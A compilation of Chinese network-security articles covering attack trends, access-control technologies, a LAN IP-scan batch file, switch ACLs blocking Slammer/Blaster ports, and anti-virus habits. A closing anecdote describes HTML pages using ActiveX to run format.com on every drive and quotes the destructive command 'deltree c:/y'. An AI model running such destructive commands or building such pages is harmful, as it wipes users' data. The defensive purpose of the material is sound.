无论你的网络应用有多安全，总有些人能够发现攻击这些应用的方法。因此，你不得不使用重重的安全控制措施，比如防火墙，IPS，输入验证，严格的认证要求，最低访问控制，坚固的网络服务器以及操作系统，系统监控等等。这样，即使某一种防御失败了，你还有半打其他的保护措施来应对。

透彻地分析漏洞评估，而不是不加思考地接受所有结果，这样你的网络应用安全测试将进入更高的水平。让管理层知道，你不仅能从商业角度平衡应用安全与现实的关系，更重要的是你还能够减轻自己、团队以及开发人员的工作量，因此所有人都能够专注于真正重要的方面。

熟知当今最流行的网络攻击的六大趋势

作者：黑客基地　来源：黑客基地

在最近几年里，网络攻击技术和攻击工具有了新的发展趋势，使借助Internet运行业务的机构面临着前所未有的风险，本文将对网络攻击的新动向进行分析，使读者能够认识、评估，并减小这些风险。

趋势一：自动化程度和攻击速度提高

攻击工具的自动化水平不断提高。自动攻击一般涉及四个阶段，在每个阶段都出现了新变化。扫描可能的受害者。自1997年起，广泛的扫描变见惯。目前，扫描工具利用更先进的扫描模式来改善扫描效果和提高扫描速度。损害脆弱的系统。以前，安全漏洞只在广泛的扫描完成后才被加以利用。而现在攻击工具利用这些安全漏洞作为扫描活动的一部分，从而加快了攻击的传播速度。传播攻击。在2000年之前，攻击工具需要人来发动新一轮攻击。目前，攻击工具可以自己发动新一轮攻击。像红色代码和尼姆达这类工具能够自我传播，在不到18个小时内就达到全球饱和点。攻击工具的协调管理。随着分布式攻击工具的出现，攻击者可以管理和协调分布在许多Internet系统上的大量已部署的攻击工具。目前，分布式攻击工具能够更有效地发动拒绝服务攻击，扫描潜在的受害者，危害存在安全隐患的系统。

趋势二：攻击工具越来越复杂

攻击工具开发者正在利用更先进的技术武装攻击工具。与以前相比，攻击工具的特征更难发现，更难利用特征进行检测。攻击工具具有三个特点：反侦破，攻击者采用隐蔽攻击工具特性的技术，这使安全专家分析新攻击工具和了解新攻击行为所耗费的时间增多；动态行为，早期的攻击工具是以单一确定的顺序执行攻击步骤，今天的自动攻击工具可以根据随机选择、预先定义的决策路径或通过入侵者直接管理，来变化它们的模式和行为；攻击工具的成熟性，与早期的攻击工具不同，目前攻击工具可以通过升级或更换工具的一部分迅速变化，发动迅速变化的攻击，且在每一次攻击中会出现多种不同形态的攻击工具。此外，攻击工具越来越普遍地被开发为可在多种操作系统平台上执行。许多常见攻击工具使用IRC或HTTP(超文本传输协议)等协议，从入侵者那里向受攻击的计算机发送数据或命令，使得人们将攻击特性与正常、合法的网络传输流区别开变得越来越困难。

趋势三：发现安全漏洞越来越快

新发现的安全漏洞每年都要增加一倍，管理人员不断用最新的补丁修补这些漏洞，而且每年都会发现安全漏洞的新类型。入侵者经常能够在厂商修补这些漏洞前发现攻击目标。

趋势四：越来越高的防火墙渗透率

防火墙是人们用来防范入侵者的主要保护措施。但是越来越多的攻击技术可以绕过防火墙，例如，IPP(Internet打印协议)和WebDAV(基于Web的分布式创作与翻译)都可以被攻击者利用来绕过防火墙。

趋势五：越来越不对称的威胁

Internet上的安全是相互依赖的。每个Internet系统遭受攻击的可能性取决于连接到全球Internet上其他系统的安全状态。由于攻击技术的进步，一个攻击者可以比较容易地利用分布式系统，对一个受害者发动破坏性的攻击。随着部署自动化程度和攻击工具管理技巧的提高，威胁的将继续增加。

趋势六：对基础设施将形成越来越大的威胁

基础设施攻击是大面积影响Internet关键组成部分的攻击。由于用户越来越多地依赖Internet完成日常业务，基础设施攻击引起人们越来越大的担心。基础设施面临分布式拒绝服务攻击、蠕虫病毒、对Internet域名系统(DNS)的攻击和对路由器攻击或利用路由器的攻击。

拒绝服务攻击利用多个系统攻击一个或多个受害系统，使受攻击系统拒绝向其合法用户提供服务。攻击工具的自动化程度使得一个攻击者可以安装他们的工具并控制几万个受损害的系统发动攻击。入侵者经常搜索已知包含大量具有高速连接的易受攻击系统的地址块，电缆调制解调器、DSL和大学地址块越来越成为计划安装攻击工具的入侵者的目标。由于Internet是由有限而可消耗的资源组成，并且Internet的安全性是高度相互依赖的，因此拒绝服务攻击十分有效。蠕虫病毒是一种自我繁殖的恶意代码。与需要用户做某种事才能继续繁殖的病毒不同，蠕虫病毒可以自我繁殖。再加上它们可以利用大量安全漏洞，会使大量的系统在几个小时内受到攻击。一些蠕虫病毒包括内置的拒绝服务攻击载荷或Web站点损毁载荷，另一些蠕虫病毒则具有动态配置功能。但是，这些蠕虫病毒的最大影响力是，由于它们传播时生成海量的扫描传输流，它们的传播实际上在Internet上生成了拒绝攻击，造成大量间接的破坏(这样的例子包括：DSL路由器瘫痪；并非扫描本身造成的而是扫描引发的基础网络管理(ARP)传输流激增造成的电缆调制解制器ISP网络全面超载)。

DNS是一种将名字翻译为数字IP地址的分布式分级全球目录。这种目录结构最上面的两层对于Internet运行至关重要。在顶层中有13个“根”名服务器。下一层为顶级域名(TLD)服务器，这些服务器负责管理“.com”、“.net”等域名以及国家代码顶级域名。DNS面临的威胁包括：缓存区中毒，如果使DNS缓存伪造信息的话，攻击者可以改变发向合法站点的传输流方向，使它传送到攻击者控制的站点上；破坏数据，攻击者攻击脆弱的DNS服务器，获得修改提供给用户的数据的能力；拒绝服务，对某些TLD域名服务器的大规模拒绝服务攻击会造成Internet速度普遍下降或停止运行；域劫持，通过利用客户升级自己的域注册信息所使用的不安全机制，攻击者可以接管域注册过程来控制合法的域。路由器是一种指挥Internet上传输流方向的专用计算机。路由器面临的威胁有：将路由器作为攻击平台，入侵者利用不安全的路由器作为生成对其他站点的扫描或侦察的平台；拒绝服务，尽管路由器在设计上可以传送大量的传输流，但是它常常不能处理传送给它的同样数量的传输流，入侵者利用这种特性攻击连接到网络上的路由器，而不是直接攻击网络上的系统；利用路由器之间的信赖关系，路由器若要完成任务，就必须知道向哪里发送接收到的传输流，路由器通过共享它们之间的路由信息来做到这点，而这要求路由器信赖其收到的来自其他路由器的信息，因此攻击者可以比较容易地修改、删除全球Internet路由表或将路由输入到全球Internet路由表中，将发送到一个网络的传输流改向传送到另一个网络，从而造成对两个网络的拒绝服务攻击。尽管路由器保护技术早已可供广泛使用，但是许多用户没有利用路由器提供的加密和认证特性来保护自己的安全。

安全攻略　探秘全新一代安全接入技术

作者：hanbin　来源：赛迪网技术社区

当传统的终端安全技术（Antivirus、Desktop Firewall…etc.）努力保护被攻击的终端时，它们对于保障企业网络的可使用性却无能为力，更不要说能确保企业的弹性与损害恢复能力。针对于此，目前出现了几种安全接入技术，这些技术的主要思路是从终端着手，通过管理员指定的安全策略，对接入私有网络的主机进行安全性检测，自动拒绝不安全的主机接入保护网络直到这些主机符合网络内的安全策略为止。目前具有代表性的技术包括：思科的网络接入控制NAC技术，微软的网络接入保护技术NAP以及TCG组织的可信网络连接TNC技术等。综上所述，NAC和NAP的优势在于其背后拥有思科、微软这样的网络与操作系统的巨头，这些技术将随着其下一代产品同时绑定发布。NAC目前已经随思科的新一代网络设备一起，在2004年开始推向市场，而NAP则计划于2006年年底，随微软的Windows Vista操作系统一起，推向市场。而TNC的优势在于其开放性，目前TNC规范已经发展到1.1版本，TCG组织的成员都可以对其提出自己的意见，并且由于技术的开放，所以国内厂商也可以自主研发相关产品，例如之前的TPM一样，可以拥有自主知识产权。

NAC技术

网络接入控制（Network Access Control，简称NAC）是由思科（Cisco）主导的产业级协同研究成果，NAC可以协助保证每一个终端在进入网络前均符合网络安全策略。NAC技术可以提供保证端点设备在接入网络前完全遵循本地网络内需要的安全策略，并可保证不符合安全策略的设备无法接入该网络、并设置可补救的隔离区供端点修正网络策略，或者限制其可访问的资源。

NAP技术

网络访问保护NAP技术(Network Access Protection)是为微软下一代操作系统Windows Vista和Windows Server Longhorn设计的新的一套操作系统组件，它可以在访问私有网络时提供系统平台健康校验。NAP平台提供了一套完整性校验的方法来判断接入网络的客户端的健康状态，对不符合健康策略需求的客户端限制其网络访问权限。为了校验访问网络的主机的健康，网络架构需要提供如下功能性领域：健康策略验证：判断计算机是否适应健康策略需求。网络访问限制：限制不适应策略的计算机访问。自动补救：为不适应策略的计算机提供必要的升级，使其适应健康策略。

动态适应：自动升级适应策略的计算机以使其可以跟上健康策略的更新。

TNC技术

可信网络连接技术TNC（Trusted Network Connection）是建立在基于主机的可信计算技术之上的，其主要目的在于通过使用可信主机提供的终端技术，实现网络访问控制的协同工作。又因为完整性校验被终端作为安全状态的证明技术，所以用TNC的权限控制策略可以估算目标网络的终

端适应度。TNC网络构架会结合已存在的网络访问控制策略（例如802.1x、IKE、Radius协议）来实现访问控制功能。TNC构架的主要目的是通过提供一个由多种协议规范组成的框架来实现一套多元的网络标准，它提供如下功能：平台认证：用于验证网络访问请求者身份，以及平台的完整性状态。

终端策略授权：为终端的状态建立一个可信级别，例如：确认应用程序的存在性、状态、升级情况，升级防病毒软件和IDS的规则库的版本，终端操作系统和应用程序的补丁级别等。从而使终端被给予一个可以登录网络的权限策略从而获得在一定权限控制下的网络访问权。访问策略：确认终端机器以及其用户的权限，并在其连接网络以前建立可信级别，平衡已存在的标准、产品及技术。评估、隔离及补救：确认不符合可信策略需求的终端机能被隔离在可信网络之外，如果可能执行适合的补救措施。

对比分析

以上可以看出，NAC、NAP和TNC技术的目标和实现技术具有很大相似性。首先，其目标都是保证主机的安全接入，即当PC或笔记本接入本地网络时，通过特殊的协议对其进行校验，除了验证用户名密码、用户证书等用户身份信息外，还验证终端是否符合管理员制定好的安全策略，如：操作系统补丁、病毒库版本等信息。并各自制定了自己的隔离策略，通过接入设备（防火墙、交换机、路由器等），强制将不符合要求的终端设备隔离在一个指定区域，只允许其访问补丁服务器进行下载更新。在终端主机没有安全问题后，再允许其接入被保护的网络。其次，三种技术的实现思路也比较相似。都分为客户端、策略服务以及接入控制三个主要层次。NAC分为：Hosts Attempting Network Access、Network Access Device、Police Decision Points三层；NAP分为：NAP客户端、NAP服务器端、NAP接入组件（DHCP、VPN、IPsec、802.1x）；TNC分为AR、PEP、PDP三层。同时，由于三种技术的发布者自身的背景，三种技术又存在不同的偏重性。NAC由于是CISCO发布的，所以其构架中接入设备的位置占了很大的例，或者说NAC自身就是围绕着思科的设备而设计的；NAP则偏重在终端agent以及接入服务组件），这与微软自身的技术背景也有很大的关联；而TNC技术则重点放在与TPM绑定的主机身份认证与主机完整性验证，或者说TNC的目的是给TCG发布的TPM提供一种应用支持。从发展上来说，目前NAC与NAP已经结为同盟，即网络接入设备上采用思科的NAC技术，而主机客户端上则采用微软的NAP技术，从而达到了两者

互补的局面，有利于其进一步发展。而TNC则是由TCG组织成员Intel、HP、DELL、Funk等企业提出的，目标是解决可信接入问题，其特点是只制定详细规范，技术细节公开，各个厂家都可以自行设计开发兼容TNC的产品，并可以兼容安全芯片TPM技术。

系统安全基础之在Windows中跟踪IP地址

系统安全基础之在Windows中跟踪IP地址

作者：赵长林　来源：赛迪网

作为网管员，在我们解决Windows 操作系统的DHCP故障时，有时要找出某个地址范围内有哪些地址没有被使用。本人以前介绍过一种方法：打开命令提示窗口，在For…in…Do循环中调用ping命令。例如，为了找出在地址范围192.168.1.1 到 192.168.1.100有哪些地址没有被使用，可以使用这个命令：For /L %f in (1,1,100) Do Ping.exe -n 2 192.168.1.%f

该命令会报告指定范围内的所有IP地址，不管是在用的还是未用的，用户都不得不在命令行窗口中翻看大量的内容。其实，我们完全可以避免这些麻烦，只需建立一个批处理文件，要求它只返回那些未用的IP地址，然后再将命令的结果输入到一个文本文件中。下面介绍方法：

打开记事本，在窗口中输入如下的命令：

@Echo off

date /t > IPList.txt

time /t >> IPList.txt

echo =========== >> IPList.txt

For /L %%f in (1,1,100) Do Ping.exe -n 2 192.168.1.%%f | Find

"Request timed out." && echo 192.168.1.%%f Timed Out >>

IPList.txt && echo off

cls

Echo Finished!

@Echo on

Notepad.exe IPList.txt

将此文件存为IPTracker.bat，关闭记事本程序。

需要注意的是，在这个批处理文件中，整个的For…In…Do命令由几个被“&&”连接起来的命令组成。该命令以“For”开始，以“Off”结尾，而且整个命令必须在一行上。当然，如果用户要使用此方法的话，需要使用用户自己的IP地址来替换示例中的IP地址。

以后，如果用户要解决DHCP问题，可以在浏览器窗口中定位并双击IPTracker.bat文件，然后启动一个IP地址跟踪工具，这个批处理只查找那些未用的IP地址，并将结果存到记事本文件中。（在此例中，这个保存的批处理文件成为一个IP地址跟踪工具，它可以一次创建，反复使用。）

注意：此方法只适用于Windows XP Professional（专业版）

教你如何巧用三层交换安全策略预防病毒

作者：邻家小孩　来源：赛迪网技术社区

目前计算机网络所面临的威胁大体可分为两种：一是对网络中信息的威胁；二是对网络中设备的威胁。影响计算机网络的因素很多，主要是网络软件的漏洞和“后门”，这些漏洞和缺陷恰恰是黑客进行攻击的首选目标。一些黑客攻入网络内部的事件，这些事件的大部分就是因为安全措施不完善所招致的苦果。软件的“后门”都是软件公司的设计编程人员为了自己方便而设置的，一旦 “后门”打开，造成的后果将不堪设想。其实，三层交换机的安全策略也具备预防病毒的功能。下面我们详细介绍一下如何利用三层交换机的安全策略预防病毒。计算机网络的安全策略又分为物理安全策略和访问控制策略

1、物理安全策略

物理安全策略的目的是保护计算机系统、网络服务器、打印机等硬件实体和通信链路免受自然灾害、人为破坏和搭线攻击；验证用户的身份和使用权限、防止用户越权操作；确保计算机系统有一个良好的电磁兼容工作环境。

2、访问控制策略

访问控制是网络安全防范和保护的主要策略，它的主要任务是保证网络资源不被非法使用和非常访问。它也是维护网络系统安全、保护网络资源的重要手段。安全策略分为入网访问控制、网络的权限控制、目录级安全控制、属性安全控制、网络服务器安全控制、网络监测和锁定控制、网络端口和节点的安全控制等。为各种安全策略必须相互配合才能真正起到保护作用，但访问控制可以说是保证网络安全最重要的核心策略之一。病毒入侵的主要来源通过软件的“后门”。包过滤设置在网络层，首先应建立一定数量的信息过滤表，信息过滤表是以其收到的数据包头信息为基础而建成的。信息包头含有数据包源IP地址、目的IP地址、传输协议类型(TCP、UDP、ICMP等)、协议源端口号、协议目的端口号、连接请求方向、ICMP报文类型等。当一个数据包满足过滤表中的规则时，则允许数据包通过，否则禁止通过。这种防火墙可以用于禁止外部不合法用户对内部的访问，也可以用来禁止访问某些服务类型。但包过滤技术不能识别有危险的信息包，无法实施对应用级协议的处理，也无法处理UDP、RPC或动态的协议。根据每个局域网的防病毒要求，建立局域网防病毒控制系统，分别设置有针对性的防病毒策略。

划分VLAN

1、基于交换机的虚拟局域网

基于交换机的虚拟局域网能够为局域网解决冲突域、广播域、带宽问题。可以基于网络层来划分VLAN，有两种方案，一种按协议(如果网络中存在多协议)来划分；另一种是按网络层地址(最常见的是TCP/IP中的子网段地址)来划分。建立VLAN也可使用与管理路由相同的策略。根据IP子网、IPX网络号及其他协议划分VLAN。同一协议的工作站划分为一个VLAN，交换机检查广播帧的以太帧标题域，查看其协议类型，若已存在该协议的VLAN，则加入源端口，否则，创建—个新的VLAN。这种方式构成的VLAN，不但大大减少了人工配置 VLAN的工作量，同时保证了用户自由地增加、移动和修改。不同VLAN网段上的站点可属于同一VLAN，在不同VLAN上的站点也可在同一物理网段上。利用网络层定义VLAN缺点也是有的。与利用MAC地址的形式相比，基于网络层的VLAN需要分析各种协议的地址格式并进行相应的转换。因此，使用网络层信息来定义VLAN的交换机要比使用数据链路层信息的交换机在速度上占劣势。

2、增强网络的安全性

共享式LAN上的广播必然会产生安全性问题，因为网络上的所有用户都能监测到流经的业务，用户只要插入任一活动端口就可访问网段上的广播包。采用VLAN提供的安全机制，可以限制特定用户的访问，控制广播组的大小和位置，甚至锁定网络成员的MAC地址，这样，就限制了未经安全许可的用户和网络成员对网络的使用。

设置访问控制列表

首先根据各单位的需求，制定不同的策略，比如文件的传输、游戏等。在制定策略之前，我们首先要了解什么样的文件依靠计算机上哪个端口来传输。端口大约分为三类：公认端口(0—1023)：它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是HTTP通讯，110端口实际上是pop3通讯。注册端口(1024—49151)：它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。动态和/或私有端口(49152—65535)：理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。例如：

These ACLs are to block virus attack (这些访问控制列表要堵塞病毒攻击)

You need to make sure all your expected network service are not blocked by these ACLs

(你需要确定你的需要的网络服务中不备访问控制列表要堵塞)

These ACLs' precedence are within 1001 ~ 1500(访问控制列表优先在1001-1500)

SQL Slammer/MS-SQL Server Worm(病毒)

create access-list udp1434-d-de udp destination any ip-port 1434 source any

ip-port any deny ports any precedence 1001(创建数据列表为udp1434-d-de，凡是

来源于1434端口的数据包都优先于1001)

W32/Blaster worm (病毒)

create access-list udp69-d-de udp destination any ip-port 69 source any ip-port

any deny ports any precedence 1011(创建数据列表为udp69-d-de udp，凡是来源于69

端口的数据包都优先于1011)

create access-list udp135-d-de udp destination any ip-port 135 source any ip-port

any deny ports any precedence 1013(创建数据列表为udp135-d-de udp，凡是来源于135

端口的数据包都优先于1013)

端口隔离：使用交换机system-guard检测功能、设置当前最大可检测染毒主机的数目、设置每次地址学习相关参数， system-guard enable (使能system-guard检测功能，在使用防火墙功能前，请确保端口的优先级配置处于缺省状态，即：端口的优先级为0，且交换机对于报文中的cos优先级不信任。)

system-guard detect-maxnum 5 (设置当前最大可检测的染毒主机数目5台)

system-guard detect-threshold IP-record-threshold record-times-threshold isolate-time

(该命令可以设置地址学习数目的上限、重复检测次数的上限和隔离时间。)

举例来说，在设置了地址学习数目的上限为50、重复检测次数的上限为3、隔离时间为5后，系统如果连续3次检测到来自源IP的地址每次IP地址学习数目都超过了50，系统就认为受到了攻击，将此源IP检测出来，在5倍的老化周期内不学习来自此源IP的报文中的目的IP地址。

结束语

随着计算机技术和通信技术的发展，计算机网络将日益成为工业、农业和国防等方面的重要信息交换手段，渗透到社会生活的各个领域。因此，认清网络的脆弱性和潜在威胁，采取强有力的安全策略，对于保障网络的安全性将变得十分重要

百毒不侵 如何以不变应万变预防病毒

百毒不侵　如何以不变应万变预防病毒

作者：hanbin　来源：赛迪网技术社区

我的系统是Windows XP的，没装杀毒软件，只装了一个个人版防火墙。磁盘分为C、D、E、F、G，每周还原两次C盘。这样即使种了毒，病毒也不会活过3天。

方法如下：C盘为系统盘安装了必要的驱动和软件后，将软件中的存盘设置选项设到为F盘的一个文件夹下，以便于管理。例如：下载软件的DOWENLOAD，QQ聊天纪录等等。之后对C盘做GHOST存在G盘取名ghost1文件。这样我们的系统、驱动、还有安装信息及注册信息都被备份下来了，现在可以上网了。

第一次备份后，每次装新软件的话一定要再备份一下C盘 ，每次文件名都用GHOST2，存在G盘。顺便把安装软件备份下来，我把它存在D盘下的SETUP文件夹下并压缩，我想应给不会有谁会在机器上一下装几十套软件吧！拿出几百兆空间对于现在大多数硬盘来说不算什么。

针对病毒我们有两套备份系统，中毒后用GHOST2文件还原，还原后第一次备份后的软件还在，不用安装，省了不少事。如果还原后还有毒，说明病毒已经备份到了GHOST2文件中，他已经没用了，删掉，用GHOST1文件还原就会解决。然后用D盘的备份安装软件安装。这样少麻烦一点，会多花几分钟。完成后重做GHOST2文件。E、F盘保存一些个人资料，比如电影歌曲了这样我们只浪费3-4G的硬盘空间，却省了不少时间和精力，每次还原只要十几分钟，什么时候还原就随你便了，反正我们的资料不会被还原掉，应当注意：

1.由于我们只对C盘还原，因此要注意，在C盘以外发现陌生文件千万不要随便点击。最好按SHIFE+DELET键删除；

2.系统速度明显变慢，那你最好还原一下；

3.当防火墙拦截到不明软件访问网络时，最好还原一下；

4.最好关掉不必要的服务既节省计算机的资源又不给黑客可乘之机，方法是“开始-〉运行-〉msconfig-〉服务”。具体关闭哪些自己去搜一下吧，介绍的文章很多。

好了现在让病毒来的更猛烈些吧！！

如何去除电子邮件病毒之“天龙九部”

作者：hanbin　来源：赛迪网技术社区

选择一款可靠的防毒软件。要对付邮件病毒，在邮件接收过程中对其进行病毒扫描过滤有害病毒是非常有效的手段。用户可以借杀毒软件中的邮件监视功能来实现，设置了邮件监视功能，可以在接收邮件过程中对病毒进行处理，有效防止邮件病毒的侵入

第一式、选择一款可靠的防毒软件

要对付邮件病毒，在邮件接收过程中对其进行病毒扫描过滤有害病毒是非常有效的手段。用户可以借杀毒软件中的邮件监视功能来实现，设置了邮件监视功能，可以在接收邮件过程中对病毒进行处理，有效防止邮件病毒的侵入。

第二式、定期升级病毒库

特别是防病毒软件厂商提供的升级服务是非常周到的，其软件病毒库都处在时时更新状态中，厂商会根据最近流行病毒的情况，随时更新病毒代码到病毒库中，如果用户不及时升级，就很难对新病毒进行查杀，这时就不能怪杀毒软件找不到病毒了。

第三式、识别邮件病毒

一些邮件病毒具有广泛的共同特征，找出它们的共同点可以防止一部门病毒的破坏。当收到邮件时，先看邮件大小，如果发现邮件中无内容，无附件，邮件自身的大小又有几十K或者更大，那么此邮件中极有可能包含有病毒，可直接从电脑中册除，然后再清空废件箱；记住，下一步的操作非常重要，在清空废件箱后，一定要压缩一遍邮箱，不然杀毒软件在下次查毒时还会报有病毒；如果发现收到的邮件对方地址非常陌生，域名对极不像正常的国内邮箱，那就很有可能是收到病毒了，这个时候，也可以选择直接删除。看附件的后缀名，如果是双后缀那么极有可能是病毒，因为邮件病毒会选择隐藏在附件中，直接册除即可。

第四式、让邮件监视功能起作用

很多用户在购买了杀毒软件后，会因为一些原因而不打开实时监控防火墙，因为杀毒软件在运行中会占用一些系统资源，不过这是不可避免的，就看用户怎么调节使用了。如果不打开实时监视功能，会让邮件病毒和其他病毒趁机钻电脑的空子，没有保护措施的电脑在病毒面前几乎没有抵挡能力。因此，要安全保护电脑，病毒监视功能就一定要运行。

第五式、投石问路

当遇到带有附件的邮件时，如果附件为可执行文件(*.exe、*.com)或带有宏功能的word文档时，不要选择打开，可以用两种方法来检测是否带有病毒。一种方法是，利用杀毒软件的邮件病毒监视功能来过滤掉邮件中的病毒。另一种方法是，把附件先另存在硬盘上，然后利用杀毒软件进行进行查毒。

第六式、尽量不在“地址薄”中设置联系名单

因为一但被病毒感染，病毒会通过邮件“地址薄”中的联系人来传播。如果要发送邮件，可以进入收件箱，打开对方发来的邮件，利用“回复”功能来发送新邮件，这么多客户与朋友，进行回复当然会有点不方便，可以新建一个文本文件，把客户的邮件地址全都列入其中，要发新邮件的时候，利用复制、粘贴快捷键把地址送到收件人栏中，这样是麻烦了一点，不过可以把最要客户与朋友的名单列进去，万一在病毒爆发的时候，也不会造成不必要的损失。用此方法可以避免病毒的扩散，特别是有商业关系的客户不会因为病毒事件而使公司受到损失。

第七式、少使用信纸模块

大部分邮件收发软件如中国用户常用的Foxmail，都提供了信纸模块，使得人们在发信中可以选择更美丽的界面，但是，美丽过后隐藏着病毒的威胁。往往信纸模块都是一些脚本文件，如果模块感染了脚本病毒例如VBS/KJ、欢乐时光等，那用户使用信纸发出去的邮件都带有病毒了。

第八式、设置邮箱自动过滤功能

通过WEB上网收发邮件的朋友可以使用邮箱提供的自动过滤邮件功能，这样不仅能够防止垃圾邮件，还可以过滤掉一些带病毒邮件不进行收件箱中，这样也减少了病毒感染的机会。做法是，把陌生的邮件发送人地址列入自动过滤，以后就不会再有相同地址的邮件出现了。

第九式、不使用邮件软件邮箱中的预览功能

当今，一些传播与破坏力比较大的病毒，往往都是通过邮件预览时进行感染，并不需要打开邮件。如果使用Outlook收发邮件，建议用户关掉邮箱工具的预览项；或者升级微软的最新补丁，可以预防Outlook接收邮件时进行感染。如果使用的是Foxmail，在当前帐户属性中模快项选择纯文本格式。

恶意软件耍花招 网民需警惕非官方版本

恶意软件耍花招 网民需警惕非官方版本

奇虎 【转载】

迫于社会各界和广大网民的声讨，恶意软件纷纷表示“从良”，部分恶意软件甚至出示公证以示自身清白。近日，奇虎360安全中心发现，某些恶意软件的官方版本已无恶意行为，但流传更广、安装量更大的“非官方版本”则保留了之前的恶意软件特征，甚至行为更加恶劣。

安全专家表示，在利益驱动下，恶意软件为了逃避社会的谴责和技术查杀已经无所不用其极，反恶意软件之路，依然任重道远。

同一软件，两个截然不同的版本

360安全中心的专家告诉记者，为了掩人耳目、混淆视听，恶意软件厂商为自己的软件准备了“两个截然不同的版本”：一方面，在官方网站上提供下载的版本已经改正了之前的恶意行为；另一方面，在第三方软件捆绑的版本中，依然是恶意行为的产品。

“表面上看起来已经‘从良’，实际上毫无悔改”，360安全中心进一步介绍，这些恶意软件官方版本的后台升级部分往往被“做了手脚”，换成一个根本不存在的URL，这样如果服务器端发布“恶意”更新时，官方版本不会升级到这个版本。而非官方版本，依然具有无法卸载、弹出广告、收集用户隐私等行为特征，甚至造成用户电脑蓝屏等现象。此外，也有恶意软件厂商对官方版本和非官方版本提供不同的升级地址，并通过技术手段，分发不同的升级内容。

由于非官方版本的传播比较隐蔽，恶意软件甚至使用更加恶劣的手段来逃避卸栽和安全工具的查杀。据360安全中心对部分恶意软件的截获分析，在非官方版本中往往集成了针对查杀软件的“打击模块”，一旦在安装时检测到查杀软件的踪迹，将提示系统错误、蓝屏死机，或者干脆偷偷卸载掉查杀软件。

九成以上用户被强制安装“非官方版本”

据了解，恶意软件的传播途径主要有三种：官方网站提供下载，与共享软件捆绑，植入恶意网站中强制安装。而恶意软件厂商通常都是使用后两种手段进行大规模推广，网民电脑中的恶意软件，绝大多数来自后两种途径，根据统计数据，9成以上的网民被强制安装了“非官方版本”。

为此，安全专家分析，尽管这部分恶意软件官方网站提供下载的版本为“正常软件”，但这部分下载量本来就很小，与恶意软件的总安装相比，可以说是“九牛一毛”，所以实际意义并不大。

相反，恶意软件厂商的这一举措既能造成“痛改前非”的假象，让网民放松警惕。更让人担忧的是，恶意软件厂商企图堂而皇之的退出恶意软件的名单，最终达到其“非官方版本”长期驻留用户电脑，继续制作、传播恶意软件的目的。

360安全中心提醒：需提防背后中招

针对部分恶意软件的新花样，360安全中心提醒广大网民：不要被表面现象所迷惑，也不要放松对恶意软件的警惕。如果发现类似的线索，可以到360安全卫士官方论坛（bbs.360safe.com）举报，或者在奇虎360软件百科（baike.360safe.com）中进行投票、评价。

此外，奇虎360安全中心也呼吁恶意软件查杀厂商、政府和行业协会共同关注这一新问题，本着对网民负责的态度，将恶意软件的查杀进行到底。

据悉，奇虎360安全卫士于近日启动了“让网民来判定恶意软件”的新策略，不管恶意软件厂商如何狡辩，只要网民觉得“讨厌”，都可以按照自己的意愿进行卸载。

千万要当心!HTML文件也能格式化硬盘

一日，忽然听朋友说，他在上网的时候，不知点击了什么东西，而将他的硬盘全部给格式化了。笔者首先的念头就是:该不会是中了那个有名的国产宏病毒"七月杀手"?不过这个宏病毒是在系统Autoexec.bat文件中加入了"deltree c:/y"，应该不会格式化整个硬盘。

　　曾经在某个杂志上看到过一个介绍，说什么IE浏览器可以通过执行ActiveX而把硬盘格式化，而且记得当时还公布了源代码，只是当时公布的源代码是针对西班牙版的Windows，对中文版的Windows没有用，说不定那些代码现在已经被一些高手给改成了针对中文Windows的呢。

　　问问自己的朋友，他也是稀里糊涂地被格式化掉硬盘的，当时进入的网站也不记得了。

　　没有办法，笔者只好自己跑到国内的一些网站去找类似的主题文章。皇天不负苦心人，终于找到了几个可以格式化硬盘的HTML文件。网站上的版主出自好心，提醒下载的网友:只能供自己研究，不可害人。

　　考虑到危险性，笔者先用记事本随便打开其中一个看看源代码，没有想到这个源文件竟给加了密，里面是用JavaScript写的脚本，加密的部分好像只是一些字符的定义，而真正的脚本内容也只是显示一些字符在屏幕上。

　　因为自己的机器是刚装好的，没有什么特别重要的数据，所以就抱着"过把瘾就死"的念头，用IE浏览器打开了这个HTML文件。

　　接着，浏览器发出一个警告:"该页上的ActiveX控件与页上的其它部分进行交互可能不安全，是否允许进行交互?"。

　　如果你选择"是"，则就会运行那些不安全控件。不过笔者试的这个HTML文件只是给大家开个玩笑，你打开它后，它说什么"你的C盘已经被它强行输入格式化，一旦重新启动就格式化了。

　　请不要启动，立即保存有用的文件。"等诸如此类的话。笔者仔细检查了一下Windows启动程序里的内容，也没有什么变化，于是放心大胆地重启，果然是开的玩笑。

　　在下载的另外一个HTML文件中，看看源代码，不禁吓了一跳。程序仅有的不足30代代码中有24行都是调用Windows里自带的format.com命令，真是够狠的。除了A、B两个驱外，只要你能够分的区C-Z，都会被格式化。

　　为了验证其效果，又不想笔者的硬盘被格式化，笔者把Windows里自带的format.com给改了名字，然后用IE打开该HTML文件，浏览器同样发出一个警告:"该页上的某些软件(ActiveX控件)可能不安全。建议您不要运行。是否允许运行?"。

　　当你选择"是"的时候，会弹出几十个DOS窗口，可能是因为它找不到format.com这个文件，找开的所有DOS窗口都是什么显示也没有。

　　它不但调用了format.com，另外还加上了一些参数，如快速格式化等，再加上格式化时窗口就已经自动完成了硬盘格式化的工作，等你发现时也已经悔之晚矣。幸好笔者事先已经把硬盘里的format.com给改了名字，否则后果可想而知。

　　看来现在通过HTML文件来格式化中文版的Windows确实是可以做到的。以后大家上网可要小心点啦。不过，大家也不必怕被噎着而不吃饭，只要你按下面的方法做，照样能痛快淋漓地进行网上冲浪。

　　一、不要随便打开陌生人寄来的Email的附件，现在对于HTML文件，打开时如果出现所谓的"页面含有不安全的ActiveX"等信息时都该小心了，最好不要运行该ActiveX控件。

　　二、将Windows系统里比较危险的一些程序改名，比如format.com、deltree.exe等。我们在Windows下真正用到这些DOS命令的情况并不是很多，所以对直接调用DOS命令来恶意破坏系统的代码，改名不失为一种对付的好方法。你可以改为一些容易记的名字，如format.com改为format-1.com。

　　三、注意更新自己的系统，系统不一定是要最新的版本，但是其安全性方面的补丁就一定要注意，最好能去下载并安装上。我们常用的反病毒、反黑客程序要定期去更新。

　　值得注意的是:对于笔者这次用到的格式化硬盘的HTML文件，还没有什么反病毒、反黑客程序能够做出反应(这也难怪，因为这个恶意代码并不属于病毒和黑客程序的范畴)。

